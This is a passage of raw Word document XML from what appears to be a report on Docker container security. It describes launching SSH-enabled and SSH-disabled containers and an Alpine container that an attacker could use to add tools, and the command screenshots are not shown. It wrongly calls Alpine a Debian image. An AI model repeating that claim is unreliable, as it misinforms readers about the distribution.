        <w:t xml:space="preserve">At this stage, </w:t>
      </w:r>
      <w:r w:rsidR="004B4768">
        <w:t>the template</w:t>
      </w:r>
      <w:r w:rsidR="002C14FB">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004B4768">
        <w:t xml:space="preserve"> to create </w:t>
      </w:r>
      <w:r w:rsidR="00F365BA">
        <w:t xml:space="preserve">an image for each application </w:t>
      </w:r>
      <w:r w:rsidR="002C14FB">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00F365BA">
        <w:t xml:space="preserve"> already created. Now, it is time to launch </w:t>
      </w:r>
      <w:r w:rsidR="001B033E">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="0017609F">
        <w:t xml:space="preserve">container for each application based on the </w:t>
      </w:r>
      <w:r w:rsidR="0062653F">
        <w:t xml:space="preserve">previously defined </w:t>
      </w:r>
      <w:r w:rsidR="0017609F">
        <w:t>images.</w:t>
      </w:r>
      <w:r w:rsidR="009222B1">
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:r w:rsidR="007B19F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00740E95">
        <w:t>primary</w:t>
      </w:r>
      <w:r w:rsidR="007B19F8">
        <w:t xml:space="preserve"> purpose of creating containers is to </w:t>
      </w:r>
      <w:r w:rsidR="0098672D">
        <w:t xml:space="preserve">run applications in isolated environment </w:t>
      </w:r>
      <w:r w:rsidR="00C3381C">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00EA5644">
        <w:t>their</w:t>
      </w:r>
      <w:r w:rsidR="00DD2F1A">
        <w:t xml:space="preserve"> networking and file systems</w:t>
      </w:r>
      <w:r w:rsidR="002974C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C1E99">
        <w:t xml:space="preserve">wholly </w:t>
      </w:r>
      <w:r w:rsidR="002974C5">
        <w:t>separated from the host</w:t>
      </w:r>
      <w:r w:rsidR="00DD2F1A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DC3A0E">
        <w:t xml:space="preserve"> Therefore,</w:t>
      </w:r>
      <w:r w:rsidR="005F3262">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00DC3A0E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007522B9">
        <w:t>two containers are launched</w:t>
      </w:r>
      <w:r w:rsidR="00CF46D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D4F5C">
        <w:t>according</w:t>
      </w:r>
      <w:r w:rsidR="00CF46D6">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="008515CB">
        <w:t>their base image de</w:t>
      </w:r>
      <w:r w:rsidR="00F95730">
        <w:t>fined</w:t>
      </w:r>
      <w:r w:rsidR="004F0B8C">
        <w:t>, as shown in figure 34.</w:t>
      </w:r>
      <w:r w:rsidR="00F95730">
        <w:t xml:space="preserve"> The first container is launched </w:t>
      </w:r>
      <w:r w:rsidR="00B12801">
        <w:t xml:space="preserve">based on </w:t>
      </w:r>
      <w:r w:rsidR="00A62E0B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00B12801">
        <w:t>ssh_enabled image</w:t>
      </w:r>
      <w:r w:rsidR="002F5401">
        <w:t xml:space="preserve"> and thus </w:t>
      </w:r>
      <w:r w:rsidR="004849A2">
        <w:t>expos</w:t>
      </w:r>
      <w:r w:rsidR="002F5401">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="004849A2">
        <w:t xml:space="preserve"> port 22 to the host (Ubuntu).</w:t>
      </w:r>
      <w:r w:rsidR="00ED5069">
        <w:t xml:space="preserve"> The container is also set to run in </w:t>
      </w:r>
      <w:r w:rsidR="00455F19">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00ED5069">
        <w:t xml:space="preserve">background </w:t>
      </w:r>
      <w:r w:rsidR="008C394E">
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidR="00455F19">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="008C394E">
        <w:t xml:space="preserve"> name con_ssh.</w:t>
      </w:r>
      <w:r w:rsidR="00B406AD">
        <w:t xml:space="preserve"> The second container </w:t>
      </w:r>
      <w:r w:rsidR="00435638">
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00E000D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00435638">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B406AD">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00120289">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00B406AD">
        <w:t xml:space="preserve"> name con_nossh</w:t>
      </w:r>
      <w:r w:rsidR="005B376E">
        <w:t xml:space="preserve"> created based on the</w:t>
      </w:r>
      <w:r w:rsidR="00694C2F">
        <w:t xml:space="preserve"> ssh_disabled image</w:t>
      </w:r>
      <w:r w:rsidR="00435638">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00120289">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00435638">
        <w:t xml:space="preserve">background but </w:t>
      </w:r>
      <w:r w:rsidR="008D3B35">
        <w:t xml:space="preserve">without </w:t>
      </w:r>
      <w:r w:rsidR="00D13CEA">
        <w:t>forward</w:t>
      </w:r>
      <w:r w:rsidR="008D3B35">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00D13CEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00246C0D">
        <w:t xml:space="preserve">its </w:t>
      </w:r>
      <w:r w:rsidR="00D13CEA">
        <w:t>port 22.</w:t>
      </w:r>
      <w:r w:rsidR="00705769">
        <w:t xml:space="preserve"> The containers are </w:t>
      </w:r>
      <w:r w:rsidR="00970E49">
        <w:t xml:space="preserve">given names just for </w:t>
      </w:r>
      <w:r w:rsidR="00E3360D">
        <w:t>simplicity</w:t>
      </w:r>
      <w:r w:rsidR="00970E49">
        <w:t xml:space="preserve"> and clarity, </w:t>
      </w:r>
      <w:r w:rsidR="004E3237">
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidR="00970E49">
        <w:t>thoug</w:t>
      </w:r>
      <w:r w:rsidR="00A65DC6">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00970E49">
        <w:t xml:space="preserve"> to run containers without names</w:t>
      </w:r>
      <w:r w:rsidR="00A65DC6">
        <w:t xml:space="preserve"> is possible</w:t>
      </w:r>
      <w:r w:rsidR="00E3360D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004403FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00456387">
        <w:t xml:space="preserve">Figure 34 illustrates the commands </w:t>
      </w:r>
      <w:r w:rsidR="00513CBC">
        <w:t xml:space="preserve">used to launch </w:t>
      </w:r>
      <w:r w:rsidR="00FC6149">
        <w:t xml:space="preserve">each </w:t>
      </w:r>
      <w:r w:rsidR="001E78E6">
        <w:t>container</w:t>
      </w:r>
      <w:r w:rsidR="00C90B5A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D60F83E" w14:textId="326C6B6E" w:rsidR="00A85F0E" w:rsidRDefault="006E128A" w:rsidP="005F3262">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B8B9145" wp14:editId="127EC281">
            <wp:extent cx="5731510" cy="758825"/>
            <wp:effectExtent l="0" t="0" r="254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758825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="046221D9" w14:textId="0C9E86B2" w:rsidR="00420245" w:rsidRDefault="00420245" w:rsidP="007677A5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc86858625"/>
      <w:r w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: lau</w:t>
      </w:r>
      <w:r w:rsidR="007677A5" w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nching the two containers.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="3DE46E37" w14:textId="15784D18" w:rsidR="00704061" w:rsidRDefault="00704061" w:rsidP="00704061">
      <w:r>
        <w:t xml:space="preserve">Additionally, </w:t>
      </w:r>
      <w:r w:rsidR="00D4567D">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alpine </w:t>
      </w:r>
      <w:r w:rsidR="004F0D46">
        <w:t>image-based</w:t>
      </w:r>
      <w:r w:rsidR="003108EB">
        <w:t xml:space="preserve"> container is created</w:t>
      </w:r>
      <w:r w:rsidR="005D6CF7">
        <w:t>, as shown in figure 35</w:t>
      </w:r>
      <w:r w:rsidR="0049047F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004F0D46">
        <w:t xml:space="preserve"> As men</w:t>
      </w:r>
      <w:r w:rsidR="002A29CF">
        <w:t xml:space="preserve">tioned above, </w:t>
      </w:r>
      <w:r w:rsidR="006B7CE1">
        <w:t xml:space="preserve">alpine is </w:t>
      </w:r>
      <w:r w:rsidR="00876104">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00A64D0A">
        <w:t xml:space="preserve">super </w:t>
      </w:r>
      <w:r w:rsidR="006B7CE1">
        <w:t xml:space="preserve">lightweight </w:t>
      </w:r>
      <w:r w:rsidR="005A687A">
        <w:t xml:space="preserve">Linux Debian </w:t>
      </w:r>
      <w:r w:rsidR="006B7CE1">
        <w:t>image and</w:t>
      </w:r>
      <w:r w:rsidR="00C85B5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000215D4">
        <w:t xml:space="preserve">therefore takes less time to deploy compared to </w:t>
      </w:r>
      <w:r w:rsidR="007D3DCD">
        <w:t>other base images</w:t>
      </w:r>
      <w:r w:rsidR="00A27012">
        <w:t>, like Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00682F8B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007E3246">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC0DFF">
        <w:t>Also, m</w:t>
      </w:r>
      <w:r w:rsidR="007E3246">
        <w:t xml:space="preserve">ost base images </w:t>
      </w:r>
      <w:r w:rsidR="00E06847">
        <w:t>came with</w:t>
      </w:r>
      <w:r w:rsidR="00381D41">
        <w:t xml:space="preserve"> minimal features</w:t>
      </w:r>
      <w:r w:rsidR="00C3755F">
        <w:t xml:space="preserve"> and packages.</w:t>
      </w:r>
      <w:r w:rsidR="001B54E8">
        <w:t xml:space="preserve"> Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="001B6719">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="001B54E8">
        <w:t xml:space="preserve">alpine image is used to </w:t>
      </w:r>
      <w:r w:rsidR="001008C1">
        <w:t>add and run the missing packages</w:t>
      </w:r>
      <w:r w:rsidR="00E96634">
        <w:t xml:space="preserve"> in the other </w:t>
      </w:r>
      <w:r w:rsidR="00DF690E">
        <w:t>two containers</w:t>
      </w:r>
      <w:r w:rsidR="00963D90">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DF690E">
        <w:t xml:space="preserve"> Thus</w:t>
      </w:r>
      <w:r w:rsidR="00D96A73">
        <w:t>, the attacker can</w:t>
      </w:r>
      <w:r w:rsidR="00C007B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A26D2B">
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="00C007B8">
        <w:t>the alpine container to</w:t>
      </w:r>
      <w:r w:rsidR="00D96A73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF139B">
        <w:t xml:space="preserve">add tools and gather </w:t>
      </w:r>
      <w:r w:rsidR="00473FF1">
        <w:t>accurate information</w:t>
      </w:r>
      <w:r w:rsidR="00905DC1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000E33E1">
        <w:t xml:space="preserve"> The alpine container is </w:t>
      </w:r>
      <w:r w:rsidR="0093496C">
        <w:t>launched using the commands shown in the figure be</w:t>
      </w:r>
      <w:r w:rsidR="00780AC7">
        <w:t>low.</w:t>
      </w:r>
      <w:r w:rsidR="009D0CE5">
        <w:t xml:space="preserve"> First</w:t>
      </w:r>
      <w:r w:rsidR="0043626D">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009D0CE5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C543C">
        <w:t xml:space="preserve">the alpine image is pulled from the Docker Hub repository, and then </w:t>
      </w:r>
      <w:r w:rsidR="009C7C54">
        <w:t xml:space="preserve">an interactive container </w:t>
      </w:r>
      <w:r w:rsidR="0043626D">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="000E4DDC">
        <w:t xml:space="preserve">provides </w:t>
      </w:r>
      <w:r w:rsidR="004606EE">
        <w:t>access to the system shell</w:t>
      </w:r>
      <w:r w:rsidR="009E6C70">
        <w:t xml:space="preserve"> is created with the name apline1.</w:t>
      </w:r>
      <w:r w:rsidR="00B57CAF">
        <w:t xml:space="preserve"> As such,</w:t>
      </w:r>
      <w:r w:rsidR="00E87C8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B57CAF">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00E87C8C">
        <w:t xml:space="preserve">his will </w:t>
      </w:r>
      <w:r w:rsidR="001D74C7">
        <w:t xml:space="preserve">enable the </w:t>
      </w:r>
      <w:r w:rsidR="008A6EFF">
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r w:rsidR="001D74C7">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00B764D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002063BA">
        <w:t xml:space="preserve">execute shell </w:t>
      </w:r>
      <w:r w:rsidR="00F52643">
        <w:t>commands</w:t>
      </w:r>
      <w:r w:rsidR="00090E5E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A79A2A0" w14:textId="36FE08C2" w:rsidR="007261F6" w:rsidRDefault="007261F6" w:rsidP="007261F6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="066A0819" wp14:editId="4D632CBD">
            <wp:extent cx="5026660" cy="163639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26660" cy="1636395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA2C4A8" w14:textId="35E33F77" w:rsidR="00C3247B" w:rsidRDefault="00C3247B" w:rsidP="00B34291">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc86858626"/>
      <w:r w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B34291" w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alpine container with access to the shell.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="28EE2545" w14:textId="3ABAC911" w:rsidR="00B05DCF" w:rsidRPr="00B05DCF" w:rsidRDefault="00832093" w:rsidP="00B05DCF">
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:r w:rsidR="00A60525">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00536818">
        <w:t>the containers are tested and</w:t>
      </w:r>
      <w:r w:rsidR="00355691">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F64E50">
        <w:t xml:space="preserve">verified, as shown </w:t>
      </w:r>
      <w:r w:rsidR="006426B8">
        <w:t>in figure 36</w:t>
      </w:r>
      <w:r w:rsidR="00A169B5">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00955A5F">
        <w:t xml:space="preserve"> and they</w:t>
      </w:r>
      <w:r w:rsidR="004B006E">
        <w:t xml:space="preserve"> are running as expected.</w:t>
      </w:r>
      <w:r w:rsidR="0025093B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006950EE">
        <w:t xml:space="preserve">As it can </w:t>
      </w:r>
      <w:r w:rsidR="00213F91">
        <w:t>be seen, t</w:t>
      </w:r>
      <w:r w:rsidR="006D5CBD">
        <w:t xml:space="preserve">he SSH port </w:t>
      </w:r>
      <w:r w:rsidR="006567AA">
        <w:t xml:space="preserve">22 </w:t>
      </w:r>
      <w:r w:rsidR="006950EE">
        <w:t>of the con_ssh container is forw</w:t>
      </w:r>
      <w:r w:rsidR="00213F91">
        <w:t>arded to the host TCP port 49</w:t>
      </w:r>
      <w:r w:rsidR="006567AA">
        <w:t>153</w:t>
      </w:r>
      <w:r w:rsidR="00FB5C1D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF77D2" w14:textId="53540DB4" w:rsidR="00B05DCF" w:rsidRDefault="00B05DCF" w:rsidP="00B05DCF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40D93510" wp14:editId="1D4AE440">
            <wp:extent cx="5731510" cy="56197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561975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9EA2B5" w14:textId="3CBCFD70" w:rsidR="00B777D4" w:rsidRPr="00364F37" w:rsidRDefault="00B777D4" w:rsidP="00364F37">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc86858627"/>
      <w:r w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0025093B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>testing and checking the containers</w:t>
      </w:r>
      <w:r w:rsidR="00364F37" w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w14:paraId="62314AC7" w14:textId="58D4FCC2" w:rsidR="00CF6B77" w:rsidRDefault="00C974BC" w:rsidP="007677A5">
      <w:r>
        <w:t xml:space="preserve">As discussed </w:t>
      </w:r>
      <w:r w:rsidR="000F5EE3">
        <w:t xml:space="preserve">previously, Docker containers </w:t>
      </w:r>
      <w:r w:rsidR="000F52B7">
        <w:t xml:space="preserve">run in their </w:t>
      </w:r>
      <w:r w:rsidR="005154ED">
        <w:t xml:space="preserve">virtual environment </w:t>
      </w:r>
      <w:r w:rsidR="0085649B">
        <w:t>wholly</w:t>
      </w:r>
      <w:r w:rsidR="005154ED">
        <w:t xml:space="preserve"> separated from the host</w:t>
      </w:r>
      <w:r w:rsidR="0034664E">
        <w:t xml:space="preserve">, similar to </w:t>
      </w:r>
      <w:r w:rsidR="002F37AF">
        <w:t>virtual machines (VM)</w:t>
      </w:r>
      <w:r w:rsidR="002454B5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00957F43">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00FD5A5B">
        <w:t xml:space="preserve">means </w:t>
      </w:r>
      <w:r w:rsidR="00FB7C6B">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="00E420B2">
        <w:t xml:space="preserve">have their </w:t>
      </w:r>
      <w:r w:rsidR="00132274">
        <w:t xml:space="preserve">own </w:t>
      </w:r>
      <w:r w:rsidR="004D7D40">
        <w:t>s</w:t>
      </w:r>
